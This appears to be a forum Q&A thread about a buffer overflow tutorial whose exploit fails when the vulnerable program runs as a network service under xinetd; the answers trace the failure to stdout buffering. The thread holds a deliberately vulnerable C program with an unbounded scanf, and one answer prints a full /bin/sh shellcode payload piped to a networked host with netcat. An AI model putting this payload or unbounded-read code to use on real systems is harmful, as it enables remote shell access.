Simple buffer overflow via xinetd


I'm trying to make a simple buffer overflow tutorial that runs the program below as a service on port 8000 via xinetd. Code was compiled using

gcc -o bof bof.c -fno-stack-protector 

Ubuntu has stack protection turned off as well.

Exploiting locally, i.e.

python -c ---snippet--- | ./bof 

is successful and the hidden function was executed, displaying text file contents.

However, running it as a service and performing

python -c ---snippet--- | nc localhost 8000

returns nothing when exploiting. Am I missing something here?

#include <stdio.h>

/* Hidden function: main() never calls it; it is only reached by
   overwriting textdisplay()'s return address. Prints congratulations.txt. */
void secret()
{
    int c;
    FILE *file;
    file = fopen("congratulations.txt", "r");
    if (file) {
        while ((c = getc(file)) != EOF)
            putchar(c);
        fclose(file);
    }
}

void textdisplay()
{
    char buffer[56];

    /* Deliberately unbounded read: scanf("%s") writes past the 56 bytes */
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);
}

int main()
{
    textdisplay();

    return 0;
}

There are 2 answers

jgeigerm On

Output is buffered by default. To disable this, you can do the following at the top of main:

setbuf(stdout, NULL);   /* make stdout unbuffered so every printf reaches the socket immediately */

This should fix your issue.

ChrisMan On

This is an issue that I am running into as well. Almost exactly the same.

However, here is one piece that I have found out that might be helpful to you. I believe the issue has something to do with xinetd not executing the binary as a terminal and having job control.

So what I did was to have xinetd do:

server = /usr/bin/python
server_args = /opt/shell.py

Then within the /opt/shell.py I had:

import pty
pty.spawn("/opt/oflow.elf")

/opt/oflow.elf being my overflowed binary.

When I do this, I can actually send and receive data. That's when I run the following command via netcat to try and overflow the service remotely:

**printf "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80AAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQ\x7c\xfc\xff\xbf" | nc 192.168.1.2 9000**

This does nothing. However, I test the local version and it works PERFECTLY. Works every time.

Not when it's being wrapped in a Python pty and xinetd.

When I run the xinetd pointing directly to /opt/oflow.elf, I get absolutely nothing back from netcat.

So that doesn't exactly answer your question, but it should whittle it down for you.

UPDATED COMPLETE ANSWER:

I figured out why this wasn't working. No need to use Python at all. After every printf statement you must also include:

fflush(stdout);

Otherwise, xinetd doesn't know to send the stdout.

You may also need to do this for stdin:

fflush(stdin);   /* note: fflush() on an input stream is undefined behaviour in standard C;
                    setvbuf(stdin, NULL, _IONBF, 0) before the first read is the portable
                    way to turn input buffering off */
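As an added example (not code from the question or from either answer), the following C program reproduces the failure both answers are addressing: a child writes through a stdio stream attached to a pipe, standing in for the socket xinetd hands the service, and then dies without returning from main, which is what happens once the overwritten return address is used. It compares the default buffering with jgeigerm's setbuf/setvbuf approach and ChrisMan's explicit fflush; the message text, the mode names and the use of a pipe instead of a real socket are assumptions made for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

enum { KEEP_BUFFERED = 0, SET_UNBUFFERED = 1, FLUSH_EXPLICITLY = 2 };

static const char MSG[] = "You entered: AAAAAAAA\n";   /* constructed sample output */

/* A child writes MSG through a stdio stream on a pipe (non-tty, so glibc
 * fully buffers it, exactly like the socket under xinetd) and then dies via
 * _exit() without returning from main, as a process does after a hijacked
 * return address crashes it.  Returns how many bytes the parent, playing the
 * netcat side, actually received from the pipe (-1 on setup failure). */
ssize_t bytes_delivered(int mode)
{
    int fds[2];
    if (pipe(fds) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                          /* child: the "service" */
        close(fds[0]);
        FILE *out = fdopen(fds[1], "w");
        if (!out) _exit(1);
        if (mode == SET_UNBUFFERED)
            setvbuf(out, NULL, _IONBF, 0);   /* must precede the first write */
        fprintf(out, "%s", MSG);
        if (mode == FLUSH_EXPLICITLY)
            fflush(out);                     /* push the buffer out by hand */
        _exit(0);                            /* no exit handlers, no stdio flush */
    }
    close(fds[1]);                           /* parent: the netcat side */
    char buf[256];
    ssize_t total = 0, n;
    while ((n = read(fds[0], buf, sizeof buf)) > 0)
        total += n;                          /* EOF once the child is gone */
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return total;
}

int main(void)
{
    printf("default buffering, no flush: %zd bytes\n", bytes_delivered(KEEP_BUFFERED));
    printf("setvbuf unbuffered         : %zd bytes\n", bytes_delivered(SET_UNBUFFERED));
    printf("fflush before dying        : %zd bytes\n", bytes_delivered(FLUSH_EXPLICITLY));
    return 0;
}
```

The first mode delivers nothing, the other two deliver the whole message, which is why a service that never returns from main cleanly must either run unbuffered or flush after each write.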